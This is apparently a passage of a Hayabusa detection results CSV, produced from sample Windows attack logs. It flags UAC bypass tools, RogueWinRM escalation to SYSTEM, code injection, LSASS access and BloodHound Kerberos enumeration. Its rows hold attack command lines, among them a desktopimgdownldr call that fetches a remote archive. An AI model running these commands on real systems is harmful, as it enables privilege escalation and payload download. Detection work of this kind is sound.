Creation,"Command: Akagi.exe 58 c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 : Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-24 10:13:47.756 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as 
SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: spooler.exe payload.bin : Path: C:\Users\Public\tools\cinj\spooler.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent 
Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: chost.exe payload.bin : Path: C:\Users\Public\tools\evasion\chost.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\desktopimgdownldr.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:55:49.123 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image : URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe /root,""c:\windows\System32\calc.exe"" : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: ECORP\Administrator : Parent Command: C:\Windows\explorer.exe 
/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe"" : Path: C:\Windows\System32\win32calc.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\System32\calc.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious 
Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATACORE01$ : IP Address: ::ffff:10.23.23.9 : 
Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PKI01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: EXCHANGE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service 
Ticket Requested,User: admmig@OFFSEC.LAN : Service: WSUS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: DHCP01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATANIDS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PRTG-MON$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration 
(Bloodhound).evtx +2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ADFS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEBIIS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS03VULN$ : IP Address: ::ffff:10.23.23.9 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket 
